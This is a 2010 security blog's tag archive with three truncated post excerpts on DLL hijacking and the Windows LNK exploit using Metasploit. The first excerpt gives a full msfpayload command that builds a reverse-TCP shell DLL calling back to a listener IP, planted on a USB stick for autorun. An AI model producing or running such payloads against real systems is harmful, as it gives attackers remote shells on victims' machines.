Posts Tagged ‘network security audit’

Autorun DLL Hijacker (USB stick)

Posted: 26th August 2010 by Matt in code, hacks, security
Tags: , , , , , , , , ,
11

I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome. # msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: LHOST=192.168.0.58

New DLL Hijacking Exploits (many!)

Posted: 24th August 2010 by Matt in code, hacks, news, security
Tags: , , , , , , , , , , , , , , , , , , ,
7

So, for those of you who do not follow the Metasploit project as closely as others, there was a new module included in the 10125 revision which came out on Monday. This module is kind of a huge deal, because it affects many, many Windows programs. I’ll demonstrate one in this post, but if you [...]

Windows ‘LNK’ Exploit Demonstration

Posted: 20th July 2010 by Matt in hacks, news, security, social engineering
Tags: , , , , , , , , , , , , , , , , , , , , , ,
26

Ok, so with all the hype surrounding this vulnerability, I figured that I would do a write up and give an example of how it works. Metasploit, as usual, makes it really simple. I really consider this to be a social engineering attack, because you need the victim to access a share. Yes, in the [...]